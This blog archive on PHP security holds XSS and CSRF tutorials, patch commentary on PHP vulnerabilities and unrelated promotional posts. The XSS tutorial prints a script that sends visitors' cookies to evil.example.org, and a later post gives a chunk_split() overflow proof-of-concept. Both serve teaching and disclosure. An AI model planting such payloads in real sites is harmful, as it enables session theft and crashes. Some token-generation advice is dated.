Archive for the ‘PHP security’ Category

Aspects Regarding Outsourcing Skilled PHP Programmers

January 25th, 2010

PHP has come a long way since its development in 1994. Since then, many PHP freelancers have honed their skills developing dynamic web pages, going well beyond the original meaning of its name, Personal Home Page. Initially the code consisted of Common Gateway Interface binaries written in the C programming language, which could interface with databases and work with many web applications.

A PHP freelance artist is a person who can help design the website that you or your company wants to develop, to draw the eye and the traffic you desire. When looking for a qualified PHP programmer, make sure they work with what is current. Version 5.2.0 and below can still perform, but are no longer supported. 5.2.11 was released on September 16, 2009 and is still supported, along with each version up to 5.3.0. This solved a great deal of bugs and security flaws in the set of programming tools. PHP freelancers who know and use version 5.3.1 are working with the latest version of this software, and when looking for PHP freelancing experts, this is the version they should be using. This could include the ability to fetch articles stored within a MySQL database by placing the proper PHP code on each of those articles. The proprietary MySQL source code has been released under the terms of the General Public License but continues to be owned by Sun Microsystems. This technique is used by many of the high-profile websites on the web, including Facebook, Google, and others.

Outsourcing PHP jobs has become a high-demand field whose positions are becoming difficult to fill. Because the work deals with computer code and languages, small mistakes can prevent the desired effect from occurring, so a great deal of attention to detail is needed from these PHP freelancers. Knowledge and use of this language may have started out as a hobby, but it has developed into a highly skilled craft, and many PHP freelancers are totally focused on it as they develop their skills.

The creators of Globfreelance are themselves experts in the profession of PHP programming. Their website, globfreelance.com, is one of the few platforms that let these professionals make contact with the firms and people that need this kind of work done. Outsourcing PHP work has become necessary because of the shortage of these professionals, and because the site is owned and operated by a group of them, it has become the site on which to find a PHP freelancer.

Explore globfreelance.com today at no cost and see the quantity and quality of the PHP freelancers that have joined the site. You will never know whether this is the PHP outsourcing site for you until you look.


Adware Removal: How Can It Be Done?

May 29th, 2009

Is the term adware new to you? Technically proficient readers may already know it, but if the term intrigues you, it is high time you learned the truth behind its name. Adware stands for advertising-supported software. What does that mean? Adware is any software package that automatically displays, plays, or downloads advertising material onto the computer, either after the software is installed or while the application is being run or used.

How can this be, you might wonder? Judging by how it is applied, adware is software that is either bundled with another program or integrated into a particular application. Programmers often use adware because it is a means of recovering the overall development costs. Most of the time, adware also permits use of the program either free of charge or at a relatively low price. The advertising thus continuously motivates the programmer to maintain, write, and upgrade the software product. Some existing adware is likewise shareware. How do the two differ in character and use? Adware is primarily oriented to being advertising-supported. Users of the software are also offered the choice of paying for a licensed or registered copy so as to do away with the pop-up advertisements.

Apart from all this, the existence of adware is surrounded by controversy. Why so? Because adware is often spyware in disguise. It tracks, reports, and usually resells information about a user and his activities without his slightest knowledge. Oftentimes adware is also malware, meaning that it can interfere with the rest of the computer's software so as to force the user to visit the advertised website. Adware, spyware, and malware are terms that may be mistaken for one another. The shortest explanation of this confusion is this: when a user installs adware on a particular computer and it is then activated as a tracking tool, the adware becomes spyware. That is, when another user comes to use that computer, his activities are tracked by the adware without him knowing it.

Adware removal is done with programs that detect, quarantine, and totally remove the adware as well as its spyware component. Some of the best adware removal applications include Lavasoft’s Ad-Aware, BulletProofSoft’s BPS Spyware Adware, Sunbelt Software’s CounterSpy, Patrick Kolla’s Spybot Search and Destroy, Intermute’s SpySubtract, Webroot’s SpySweeper, and PC Tools’ Spyware Doctor. These adware removal applications are devised to detect the spyware present in the system and to stop it from producing viruses that will harm the computer system. Aside from using adware removal software, there are several ways to prevent an attack on your system. For one, turn on your general security settings, especially when browsing the Internet. Also keep up with Windows Update, use an alternative browser, and install ad-blocking software. You can always protect yourself if only you know how.


Learning The Language Of The Internet

April 15th, 2009

As more and more people create their first website, many find the idea of using PHP code a little challenging. HTML is much easier to understand, but it can only do so much. PHP scripts can help you make your website more user friendly and cut down the time you need to manage your site. You may feel that you will have to have someone else build that site for you, but there is another way: you can learn it yourself.

Take a look at your web hosting account. You will see that you have the ability to use PHP on your website, so why not use it? You do not have to build your site purely from PHP code; most websites are built from a combination of HTML and PHP. All you need is a tutorial to walk you through the setup. You will find that PHP code looks similar to JavaScript code. With a few PHP scripts you can have a site that collects important information, sends visitors to password-protected pages, performs calculations, and more. How much time would that cut off your workload?

Sure, there is nothing wrong with having an HTML website, but as the internet keeps changing it is nice to know that you can evolve with it. PHP is not something to mess around with if you do not know what you are doing; it can be hard to find the mistakes unless you know what the code means. But when it is done right, you will have a website that rivals your competitors’.

With all this talk about PHP scripts you may be wondering what PHP is in the first place. It stands for “Hypertext Preprocessor” (it was originally known as “Personal Home Page”) and it can be used on pretty much all types of servers. It was created by Rasmus Lerdorf in 1995 to develop dynamic web pages. Millions of webmasters have since learned the language and created websites with it. There is no reason why you can’t do the same.

A MySQL database is commonly used with PHP once the data feed is set up. You will find it quite useful as you create or update your website. Don’t worry about not knowing what a MySQL database is right now, because you can learn that too. The code gives your site a clean look and feel, and by being able to perform certain functions on it you may see more return visitors using your site.

So as you can see, you do not have to be afraid of using PHP on your website. You can find simple PHP tutorials that really help you learn how to use it. You will like what you will be able to do with your new website.

If this is your time to start learning more and gain a better understanding of PHP, then please visit PHP tutorials. If you would like to use your website to start a business, then check out supplemental income.


Drag And Drop Category Management With CakePHP

March 17th, 2009

View the full article here: Drag and drop category management with CakePHP and jQuery, or visit our blog today at EndYourIf.com

Today’s article is going to walk you through creating a slick drag-and-drop, AJAX-based category management system.
CakePHP offers really nice built-in tree management. In fact, at a bare minimum you simply need to create a table with two extra columns, tell your model to act like a “tree”, and rather than doing a find('all') you do a generatetreelist() or a find('threaded') and CakePHP takes care of the rest.

After doing a quick test, I was quite impressed with what CakePHP did for me, but I was not satisfied. I wanted to create a really slick category management system that I can re-use and show off. Well, in this tutorial I go about 90% of the way. The only thing I didn’t have time to finish was, rather than redrawing my tree through AJAX, using DHTML to dynamically update my tree after dragging and dropping. Don’t worry, I plan to finish this with a part two soon.

I know it’s not the most beautiful system in the world. But I hope it drives the point home of how much potential there is with this system. To create all of the code below and do a bit of testing took about 3 hours total! A normal category management system with unlimited sub-categories would probably take me a couple of days, AND there is no way it could match the “coolness” factor of this application.

Also, in case the screenshots are not quite clear: to create a new category, type the name in the text box and drag the red rectangle above it to where you want to place it. The category it will be placed in is highlighted in yellow. If you wish to move a category or an entire branch, simply drag it to the new parent category.

Ok, let’s move on to the actual code. The first thing to do is create our categories table:

Code
CREATE TABLE `categories` (
  `id` int(10) unsigned NOT NULL auto_increment,
  `name` varchar(255) NOT NULL,
  `parent_id` int(10) unsigned NOT NULL,
  `lft` int(10) unsigned NOT NULL,
  `rght` int(10) unsigned NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

If you’ve ever built a category system, the first three columns should look familiar. The key columns here, though, are the fourth and fifth, lft and rght. CakePHP automatically maintains these columns for us whenever we save or delete data. For a detailed explanation, see this document from MySQL: http://dev.mysql.com/tech-resources/articles/hierarchical-data.html

Now that our table is created, the next thing I did was bake my model, controller, and views. After I baked all three, I had to update and remove a few things. First off our model, the simplest part of the process:

Code
As I mentioned before, the only thing special to note here is that the “actsAs” property is set to “tree”. Next up is our controller, which is also quite basic:

Code
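Since the model and controller listings did not survive in this copy of the article, here is an added example of what they look like for the categories table above once TreeBehavior is attached. This is not the article's own code: it assumes a CakePHP 1.2-era application (the article's vintage), a view file named tree.ctp that renders the category list, and that a parent_id of 0 is treated as "no parent" to match the NOT NULL column in the schema; check that last assumption against the TreeBehavior version you run.

```php
<?php
// Added example, not the article's own code. Assumes CakePHP 1.2-era APIs
// (AppModel, AppController, TreeBehavior, generatetreelist, saveField),
// a views/categories/tree.ctp partial, and parent_id = 0 meaning "root".

// app/models/category.php
class Category extends AppModel
{
    var $name = 'Category';

    // TreeBehavior keeps lft/rght consistent on every save() and delete().
    // The keys below are its defaults, spelled out here to document the mapping
    // onto the columns in the CREATE TABLE statement.
    var $actsAs = array(
        'Tree' => array('parent' => 'parent_id', 'left' => 'lft', 'right' => 'rght'),
    );

    var $validate = array(
        'name' => array('rule' => 'notEmpty'),
    );
}

// app/controllers/categories_controller.php
class CategoriesController extends AppController
{
    var $name = 'Categories';

    // Whole tree as id => name, indented with one '-' per depth level.
    function index()
    {
        $this->set('categories', $this->Category->generatetreelist(null, null, null, '-'));
    }

    // Target of the drag-and-drop AJAX request. With no $id a new category is
    // created under $parentId (name taken from the posted form data); with an
    // $id the existing category, and its whole branch, is moved there.
    // Both ids come from the client and are untrusted: they are cast to
    // integers and the parent must exist before anything is written.
    function move($id = null, $parentId = null)
    {
        $parentId = (int)$parentId;
        if ($parentId > 0 && !$this->Category->hasAny(array('Category.id' => $parentId))) {
            $this->header('HTTP/1.1 400 Bad Request');
            $this->autoRender = false;
            return;
        }

        if ($id === null) {
            $this->Category->create();
            $saved = $this->Category->save(array('Category' => array(
                'name'      => isset($this->data['Category']['name']) ? $this->data['Category']['name'] : '',
                'parent_id' => $parentId,
            )));
        } else {
            $this->Category->id = (int)$id;
            $saved = $this->Category->saveField('parent_id', $parentId);
        }

        if (!$saved) {
            // Validation failed (empty name) or the save was refused.
            $this->header('HTTP/1.1 400 Bad Request');
            $this->autoRender = false;
            return;
        }

        // Redraw the tree for the AJAX response, as the article does.
        $this->set('categories', $this->Category->generatetreelist(null, null, null, '-'));
        $this->render('tree', 'ajax');
    }
}
```

The point of the integer casts and the hasAny() check is that a drag-and-drop client sends the node and parent ids itself; without server-side validation an arbitrary parent_id could be written into the tree and leave lft/rght inconsistent.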


Cross site scripting in php

December 24th, 2007

The media has helped make cross-site scripting (XSS) a familiar term, and the attention is deserved. It is one of the most common security vulnerabilities in web applications, and many popular open source PHP applications suffer from constant XSS vulnerabilities.

XSS attacks have the following characteristics:

  • Exploit the trust a user has for a particular site. Users don’t necessarily have a high level of trust for any web site, but the browser does. For example, when the browser sends cookies in a request, it is trusting the web site. Users may also have different browsing habits or even different levels of security defined in their browser depending on which site they are visiting.
  • Generally involve web sites that display external data. Applications at a heightened risk include forums, web mail clients, and anything that displays syndicated content (such as RSS feeds).
  • Inject content of the attacker’s choosing. When external data is not properly filtered, you might display content of the attacker’s choosing. This is just as dangerous as letting the attacker edit your source on the server.

How can this happen? If you display content that comes from any external source without properly filtering it, you are vulnerable to XSS. Foreign data isn’t limited to data that comes from the client. It also means email displayed in a web mail client, a banner advertisement, a syndicated blog, and the like. Any information that is not already in the code comes from an external source, and this generally means that most data is external data.

Consider the following example of a simplistic message board:

<form>
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

if (isset($_GET['message']))
{
    $fp = fopen('./messages.txt', 'a');
    fwrite($fp, "{$_GET['message']}<br />");
    fclose($fp);
}

readfile('./messages.txt');

?>

This message board appends <br /> to whatever the user enters, appends this to a file, then displays the current contents of the file.

Imagine if a user enters the following message:

<script>
document.location = 'http://evil.example.org/steal_cookies.php?cookies=' +
document.cookie
</script>

The next user who visits this message board with JavaScript enabled is redirected to evil.example.org, and any cookies associated with the current site are included in the query string of the URL.

Of course, a real attacker wouldn’t be limited by my lack of creativity or JavaScript expertise. Feel free to suggest better (more malicious?) examples.

What can you do? XSS is actually very easy to defend against. Where things get difficult is when you want to allow some HTML or client-side scripts to be provided by external sources (such as other users) and ultimately displayed, but even these situations aren’t terribly difficult to handle. The following best practices can mitigate the risk of XSS:

  • Filter all external data. As mentioned earlier, data filtering is the most important practice you can adopt. By validating all external data as it enters and exits your application, you will mitigate a majority of XSS concerns.
  • Use existing functions. Let PHP help with your filtering logic. Functions like htmlentities(), strip_tags(), and utf8_decode() can be useful. Try to avoid reproducing something that a PHP function already does. Not only is the PHP function much faster, but it is also more tested and less likely to contain errors that yield vulnerabilities.
  • Use a whitelist approach. Assume data is invalid until it can be proven valid. This involves verifying the length and also ensuring that only valid characters are allowed. For example, if the user is supplying a last name, you might begin by only allowing alphabetic characters and spaces. Err on the side of caution. While the names O'Reilly and Berners-Lee will be considered invalid, this is easily fixed by adding two more characters to the whitelist. It is better to deny valid data than to accept malicious data.
  • Use a strict naming convention. As mentioned earlier, a naming convention can help developers easily distinguish between filtered and unfiltered data. It is important to make things as easy and clear for developers as possible. A lack of clarity yields confusion, and this breeds vulnerabilities.

A much safer version of the simple message board mentioned earlier is as follows:

<form>
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

if (isset($_GET['message']))
{
    $message = htmlentities($_GET['message']);

    $fp = fopen('./messages.txt', 'a');
    fwrite($fp, "$message<br />");
    fclose($fp);
}

readfile('./messages.txt');

?>

With the simple addition of htmlentities(), the message board is now much safer. It should not be considered completely secure, but this is probably the easiest step you can take to provide an adequate level of protection. Of course, it is highly recommended that you follow all of the best practices that have been discussed.
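The following is an added example, not code from the original article, that puts the four best practices above together for the message board: a whitelist validator for the last-name case (with the apostrophe and hyphen added for O'Reilly and Berners-Lee), a $clean array as the naming convention so unfiltered input is never used by accident, and an output-escaping helper. The helper is where the "not completely secure" caveat bites: htmlentities() with its default flags did not encode the single quote before PHP 8.1, which is harmless in the body text the board emits but not inside a single-quoted attribute, so the helper passes ENT_QUOTES explicitly. The function names and the sample input are mine.

```php
<?php
// Added example (not from the original article): filter on input, escape on
// output. Everything from $_GET/$_POST is treated as tainted; only values that
// pass validation are copied into $clean, and only $clean is ever used later.
declare(strict_types=1);

/**
 * Whitelist validation for a last name: letters, spaces, apostrophe and
 * hyphen, length 1..64. Returns null when the value is rejected.
 */
function validateLastName(string $input): ?string
{
    if (preg_match("/^[A-Za-z' -]{1,64}$/", $input) !== 1) {
        return null;
    }
    return $input;
}

/**
 * Output escaping for HTML body and attribute contexts.
 * ENT_QUOTES: encode both quote characters (before PHP 8.1 the default left
 *             the single quote alone, so value='...' could be broken out of).
 * ENT_SUBSTITUTE: replace invalid UTF-8 instead of returning "" and silently
 *             dropping the whole value.
 * The charset is stated explicitly rather than relying on the ini default.
 */
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Validate a request array into a $clean array. Keys that fail validation are
 * simply absent, so code that forgets to filter cannot reach the raw value.
 */
function filterRequest(array $request): array
{
    $clean = [];
    if (isset($request['last_name']) && is_string($request['last_name'])) {
        $name = validateLastName($request['last_name']);
        if ($name !== null) {
            $clean['last_name'] = $name;
        }
    }
    if (isset($request['message']) && is_string($request['message'])) {
        // Free text cannot be whitelisted as tightly as a name; bound its
        // length here and rely on escapeHtml() at output time for the rest.
        if (strlen($request['message']) <= 1000) {
            $clean['message'] = $request['message'];
        }
    }
    return $clean;
}

/** Render the filtered fields as HTML fragments (escaped at the last moment). */
function renderFields(array $clean): array
{
    $out = [];
    foreach ($clean as $key => $value) {
        $out[$key] = escapeHtml($value);
    }
    return $out;
}

// Constructed sample input standing in for $_GET: a valid name and the
// article's script payload as the message.
$sample = [
    'last_name' => "O'Reilly",
    'message'   => "<script>document.location='http://evil.example.org/'</script>",
];
$clean = filterRequest($sample);
foreach (renderFields($clean) as $key => $html) {
    echo $key, ': ', $html, "\n";
}
```

Run it from the command line to see that the name survives intact while every angle bracket and quote in the message is encoded; swap the name for something like "Robert; DROP" and filterRequest() drops the key entirely instead of passing it on.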


Cross site request forgeries in php

December 24th, 2007

Despite the similarities in name, cross-site request forgeries (CSRF) are an almost opposite style of attack. Whereas XSS attacks exploit the trust a user has in a web site, CSRF attacks exploit the trust a web site has in a user. CSRF attacks are more dangerous, less popular (which means fewer resources for developers), and more difficult to defend against than XSS attacks.

CSRF attacks have the following characteristics:

  • Exploit the trust that a site has for a particular user.

    Many users may not be trusted, but it is common for web applications to offer users certain privileges upon logging in to the application. Users with these heightened privileges are potential victims (unknowing accomplices, in fact).

  • Generally involve web sites that rely on the identity of the users. It is typical for the identity of a user to carry a lot of weight. With a secure session management mechanism, which is a challenge in itself, CSRF attacks can still be successful. In fact, it is in these types of environments where CSRF attacks are most potent.
  • Perform HTTP requests of the attacker’s choosing.

    CSRF attacks include all attacks that involve the attacker forging an HTTP request from another user (in essence, tricking a user into sending an HTTP request on the attacker’s behalf). There are a few different techniques that can be used to accomplish this, and I will show some examples of one specific technique.

Because CSRF attacks involve the forging of HTTP requests, it is important to first gain a basic level of familiarity with HTTP.

A web browser is an HTTP client, and a web server is an HTTP server. Clients initiate a transaction by sending a request, and the server completes the transaction by sending a response. A typical HTTP request is as follows:

GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*

The first line is called the request line, and it contains the request method, request URL (a relative URL is used), and HTTP version. The other lines are HTTP headers, and each header name is followed by a colon, a space, and the value.

You might be familiar with accessing this information in PHP. For example, the following code can be used to rebuild this particular HTTP request in a string:

<?php

$request = '';
$request .= "{$_SERVER['REQUEST_METHOD']} ";
$request .= "{$_SERVER['REQUEST_URI']} ";
$request .= "{$_SERVER['SERVER_PROTOCOL']}\r\n";
$request .= "Host: {$_SERVER['HTTP_HOST']}\r\n";
$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
$request .= "Accept: {$_SERVER['HTTP_ACCEPT']}\r\n\r\n";

?>

An example response to the previous request is as follows:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 57

<html>
<img src="http://example.org/image.png" />
</html>

The content of a response is what you see when you view source in a browser. The img tag in this particular response alerts the browser to the fact that another resource (an image) is necessary to properly render the page. The browser requests this resource as it would any other, and the following is an example of such a request:

GET /image.png HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*

This is worthy of attention. The browser requests the URL specified in the src attribute of the img tag just as if the user had manually navigated there. The browser has no way to specifically indicate that it expects an image.

Combine this with what you’ve learned about forms, and then consider a URL similar to the following:

http://stocks.example.org/buy.php?symbol=SCOX&quantity=1000

A form submission that uses the GET method can potentially be indistinguishable from an image request – both could be requests for the same URL. If register_globals is enabled, the method of the form isn’t even important (unless the developer still uses $_POST and the like). Hopefully the dangers are already becoming clear.

Another characteristic that makes CSRF so powerful is that any cookies pertaining to a URL are included in the request for that URL. A user who has an established relationship with stocks.example.org (such as being logged in) can potentially buy 1000 shares of SCOX by visiting a page with an img tag that specifies the URL in the previous example.

Consider the following form located (hypothetically) at http://stocks.example.org/form.html:

<p>Buy Stocks Instantly!</p>
<form action="/buy.php">
<p>Symbol: <input type="text" name="symbol" /></p>
<p>Quantity:<input type="text" name="quantity" /></p>
<input type="submit" />
</form>

If the user enters SCOX for the symbol, 1000 as the quantity, and submits the form, the request that is sent by the browser is similar to the following:

GET /buy.php?symbol=SCOX&quantity=1000 HTTP/1.1
Host: stocks.example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234

I include a Cookie header in this example to illustrate the application using a cookie for the session identifier. If an img tag references the same URL, the same cookie will be sent in the request for that URL, and the server processing the request will be unable to distinguish this from an actual order.

There are a few things you can do to protect your applications against CSRF:

  • Use POST rather than GET in forms. Specify POST in the method attribute of your forms. Of course, this isn’t appropriate for all of your forms, but it is appropriate when a form is performing an action, such as buying stocks. In fact, the HTTP specification requires that GET be considered safe.
  • Use $_POST rather than rely on register_globals. Using the POST method for form submissions is useless if you rely on register_globals and reference form variables like $symbol and $quantity. It is also useless if you use $_REQUEST.
  • Do not focus on convenience.

    While it seems desirable to make a user’s experience as convenient as possible, too much convenience can have serious consequences. While “one-click” approaches can be made very secure, a simple implementation is likely to be vulnerable to CSRF.

  • Force the use of your own forms.

    The biggest problem with CSRF is having requests that look like form submissions but aren’t. If a user has not requested the page with the form, should you assume a request that looks like a submission of that form to be legitimate and intended?

Now we can write an even more secure message board:

<?php

$token = md5(time());

$fp = fopen('./tokens.txt', 'a');
fwrite($fp, "$token\n");
fclose($fp);

?>

<form method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

// file() keeps the trailing newline on each line unless told otherwise,
// so the comparison with the submitted token would never match without
// FILE_IGNORE_NEW_LINES. The isset() avoids a notice on plain GET requests.
$tokens = file('./tokens.txt', FILE_IGNORE_NEW_LINES);

if (isset($_POST['token']) && in_array($_POST['token'], $tokens, true))
{
    if (isset($_POST['message']))
    {
        $message = htmlentities($_POST['message']);

        $fp = fopen('./messages.txt', 'a');
        fwrite($fp, "$message<br />");
        fclose($fp);
    }
}

readfile('./messages.txt');

?>

This message board still has a few security vulnerabilities. Can you spot them?

Time is extremely predictable. Using the MD5 digest of a timestamp is a poor excuse for a random number. Better functions include uniqid() and rand().

More importantly, it is trivial for an attacker to obtain a valid token. By simply visiting this page, a valid token is generated and included in the source. With a valid token, the attack is as simple as before the token requirement was added.

Here is an improved message board:

<?php

session_start();

if (isset($_POST['message']))
{
    // Strict comparison: "==" on two strings that look numeric (e.g. an
    // md5 digest of the form 0e123...) would compare them as numbers.
    if (isset($_SESSION['token'], $_POST['token'])
        && $_POST['token'] === $_SESSION['token'])
    {
        $message = htmlentities($_POST['message']);

        $fp = fopen('./messages.txt', 'a');
        fwrite($fp, "$message<br />");
        fclose($fp);
    }
}

$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;

?>

<form method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

readfile('./messages.txt');

?>
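As an added example (not the article's code), here is the same token scheme written the way a current PHP deployment would do it, covering the "force the use of your own forms" and "use POST" points above. Three things differ from the improved board: the token comes from random_bytes(), the CSPRNG PHP has shipped since 7.0, rather than md5(uniqid(rand())); the comparison goes through hash_equals(), which is constant-time and never falls into loose "==" type juggling; and the token is created once per session instead of being regenerated on every page view, so a form opened in a second browser tab still submits successfully. The function names, the session key csrf_token and the CLI self-check are assumptions of mine.

```php
<?php
// Added example, not the article's own code. Assumes PHP 7+ (random_bytes,
// hash_equals) and sessions stored server-side as in the improved board.
declare(strict_types=1);

/** Return the session's CSRF token, creating it on first use. */
function csrfToken(array &$session): string
{
    if (!isset($session['csrf_token']) || !is_string($session['csrf_token'])) {
        // 32 random bytes, hex-encoded: unguessable, unlike md5(time()).
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Decide whether a request may perform a state-changing action. It must be a
 * POST (GET has to stay safe, as the HTTP specification requires) and carry a
 * token identical to the one stored in the session.
 */
function csrfRequestIsValid(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;
    }
    if (!isset($session['csrf_token'], $post['token'])
        || !is_string($session['csrf_token']) || !is_string($post['token'])) {
        return false;
    }
    // Constant-time comparison; the known value goes first by convention.
    return hash_equals($session['csrf_token'], $post['token']);
}

/** Hidden input to embed in every form that performs an action. */
function csrfField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="token" value="' . $token . '" />';
}

if (PHP_SAPI !== 'cli') {
    // The message board itself, served over HTTP.
    session_start();

    if (isset($_POST['message']) && is_string($_POST['message'])
        && csrfRequestIsValid($_SERVER['REQUEST_METHOD'], $_POST, $_SESSION)) {
        $message = htmlspecialchars($_POST['message'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        file_put_contents('./messages.txt', "$message<br />\n", FILE_APPEND | LOCK_EX);
    }

    echo '<form method="POST">', csrfField($_SESSION),
         '<input type="text" name="message" /><br /><input type="submit" /></form>';
    if (is_file('./messages.txt')) {
        readfile('./messages.txt');
    }
} else {
    // Constructed offline self-check with a fake session array: a request
    // without the token, a GET carrying the token, and a non-string token are
    // all rejected; only the POST with the session's token is accepted.
    $session = [];
    $token = csrfToken($session);
    var_dump(csrfRequestIsValid('POST', ['message' => 'hi'], $session));
    var_dump(csrfRequestIsValid('GET', ['token' => $token], $session));
    var_dump(csrfRequestIsValid('POST', ['token' => ['x']], $session));
    var_dump(csrfRequestIsValid('POST', ['token' => $token], $session));
}
```

Keeping one token per session rather than per form is a deliberate trade-off: a per-request token is marginally stronger if a single token ever leaks, but it breaks every form left open in another tab, and users who hit "back" and resubmit. Either way the token must be tied to the session and never appear in a URL, which is why the example sends it only as a hidden POST field.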


Chunk_split() Overflow not fixed at all…

June 4th, 2007

If you are one of the guys that read the PHP CVS commits you usually know about the security bugs months before the rest of the community and this is no news for you. During the last 24h the following fix was merged into the PHP CVS.
Corrected fix for CVE-2007-2872
This fixes the chunk_split() overflow that, according to the PHP 5.2.3 release notes, was already fixed. The original fix was however not only broken but complete nonsense. If you can read C you will see that the integer overflow was not fixed in PHP 5.2.3 but simply moved into a separate line, and an additional bogus if clause was added.
You can test this yourself with the following code:
<?php
$a = str_repeat("A", 65537);
$b = 1;
$c = str_repeat("A", 65537);
chunk_split($a, $b, $c);
?>

So my recent posting that was called marketing FUD is even more true.
PS: I wonder whether SEC-CONSULT was the one that reported that the fix is no fix at all, or whether it was one of the Linux distributors. The Linux distributors and their regression tests are always a good way to check whether bugs are fixed correctly.


Read more at blog-admin@nopiracy.de (Stefan Esser)


Google for me and get Zend

June 1st, 2007

Brought to you from one of the comments in my blog.
Google for "Stefan Esser" and get a sponsored link for Zend.
http://www.google.com/search?q=%22Stefan+Esser%22


Read more at blog-admin@nopiracy.de (Stefan Esser)


PHP 5.2.3 released…

June 1st, 2007

PHP 5.2.3 was released with several security fixes.
Again not all security fixes are mentioned in the release announcement.
Again security bugs known to the developers were not correctly fixed.
More info here.
PS: Why does PHP.net always release security fixes just before the weekend?

PHP Releases have historically been packaged and tagged on Wednesday, and released on Thursday. This release is no different.

As far as the session_id() issue, you did report it and even participated in the discussion regarding the problem with both Stas and me. As I am sure you know, the patch to address the remote exploit of the problem via PATH_INFO was applied on May 15th. If you knew the problem was still there, it would’ve taken just a 2-3 line e-mail to security@php.net to identify that. For whatever reason you did not, so while the security team is at fault for not looking at the issue deeper, you must admit there was plenty of time to identify the error prior to the release.


PHP 4 – Reference Counter Overflow Fix

May 20th, 2007

Because the PHP developers do not want to fix the PHP 4 Reference Counter Overflow Vulnerability that was disclosed during the Month of PHP Bugs, the Hardened-PHP Project, as usual, had to step in to protect the users of PHP.
I created a patch for the refcount overflow problem that took about 30 minutes to develop and that fixes the problem without breaking binary compatibility, something that, according to claims by Zend Engine developer and Zend employee Stanislav Malyshev, is not possible at the moment. You can apply it directly or wait until it has been ripped and merged into the default PHP CVS after being relabeled as the work of the PHP developers.

Read more at blog-admin@nopiracy.de (Stefan Esser)


Suhosin 0.9.20 and crypt() Thread Safety Vulnerability

May 19th, 2007

I just released Suhosin 0.9.20 that adds a few new features and bugfixes. The most important addition is that a mutex is placed around the call to the system’s crypt() function to ensure thread safety. This mutex is necessary to close a bunch of possible attacks on the libc crypt() function on multi threaded systems.
Because the libc crypt() function (and also the PHP port for Windows) is not thread safe, there exists a race condition that can be exploited on multi-threaded systems. When, for example, two threads try to validate passwords through crypt() at the same time, they use the same internal memory area, which can result in both crypt() calls returning invalid results, or in the result of one operation overwriting the result of the other. Obviously, in this case a thread using a wrong password will return the correct crypted password if another thread calls crypt() on the correct password at the same time, and the application will usually log in the user that used the wrong password. (However, the thread race is hard to win from remote.)

Because Suhosin changes the default crypt() method to the Blowfish implementation it ships with, which is thread safe by default, Suhosin users were safe from this vulnerability before this update, unless they provided their own salt when calling crypt().
Note: in PHP 5.2.1 the PHP developers silently closed that hole for UNIX systems that support crypt_r(). It is however very likely that they did not realise the security implications, because they have no protection for systems that do not have crypt_r(), they did not merge it into PHP 4, and they also did not fix the Windows implementation.

Read more at blog-admin@nopiracy.de (Stefan Esser)


OWASP Risk Evaluation

May 11th, 2007

When you read the OWASP risk evaluation standard carefully you might get as confused as I got. They estimate the risk by first estimating the likelihood and then estimating the technical and business impact. The estimation is done by assigning the numbers 0..9 to a number of factors.
So far so good. Most of it makes perfect sense, but I was a little bit confused about the following factor:

Opportunity

What resources and opportunity are required for this group of
attackers to find and exploit this vulnerability? No access or special
resources (0), limited access and resources (4), special access or
resources (7), full access or expensive resources (9)

According to this factor the likelihood of an attack increases when more access to the application and more expensive resources are required on the attacker’s side. I dare to doubt that

Read more at blog-admin@nopiracy.de (Stefan Esser)
